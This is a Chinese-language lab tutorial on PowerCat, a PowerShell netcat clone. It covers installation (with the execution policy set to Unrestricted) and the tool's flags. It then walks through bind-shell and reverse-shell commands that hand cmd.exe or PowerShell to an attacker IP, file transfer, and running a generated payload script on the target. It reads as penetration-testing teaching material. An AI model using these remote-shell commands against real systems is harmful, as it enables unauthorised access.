PowerCat介绍

PowerCat是一个powershell写的tcp/ip瑞士军刀，可以看成ncat的powershell的实现，然后里面也 加入了众多好用的功能，如文件上传，smb协议支持，中继模式，生成payload，端口扫描等等。

PowerCat安装

1、下载地址

https://github.com/besimorhino/powercat

2、下载下来导入

Import-Module .\powercat.ps1

3、如果提示未能加载指定模块，或运行不了则可能是权限问题，通过管理员权限打开powershell,输入如下代码

Set-ExecutionPolicy Unrestricted

4、输入如下命令可以查看帮助信息 powercat -h

5、如下就是安装成功

PowerCat命令

-l监听连接

-c连接到侦听器

-p要连接或监听的端口

-e执行 -ep执行Powershell

-r中继。格式：“-r tcp：10.1.1.1：443”

-u通过UDP传输数据

-dns通过dns传输数据

-dnsft DNS故障阈值

-t超时选项。默认值：60

-I输入：文件路径（字符串），字节数组或字符串

-o控制台输出类型：“主机”，“字节”或“字符串”

-of输出文件路径

-d连接后断开连接

-rep中继器。断开连接后重新启动

-g生成有效载荷

-ge生成编码的有效载荷

-h打印帮助消息

PowerCat实验环境简介

机器名称	机器IP
攻击机	192.168.14.137
靶机	192.168.14.131

PowerCat和nc正向连接

1、靶机使用powercat执行以下命令

powercat -l -p 8080 -e cmd.exe -v

2、攻击机使用nc执行以下命令po

nc 192.168.14.131 8080 -vv

3、查看返回结果

PowerCat和nc反向连接

1、靶机使用powercat执行以下命令

powercat -c 192.168.14.137 -p 8888 -v -e cmd.exe

2、攻击机使用nc执行以下命令

nc -l -p 8888 -vv

3、查看返回结果

PowerCat和PowerCat反向连接

1、靶机使用powercat执行以下命令

powercat -c 192.168.14.137 -p 9999 -v -ep

2、攻击机使用powercat执行以下命令

powercat -l -p 9999 -v

3、查看返回结果

PowerCat文件传输

1、靶机使用powercat执行以下命令

powercat -l -p 9999 -of test.txt -v

2、攻击机使用powercat执行以下命令

powercat -c 192.168.3.10 -p 9999 -i D:test.txt -v

3、查看返回结果

用powercat生成payload

1、攻击机使用powercat执行以下命令生成payload

2、攻击机使用powercat执行以下命令连接

powercat -c 192.168.3.10 -p 8000 -v

3、在靶机上运行脚本

.\shell.ps1

4、查看运行结果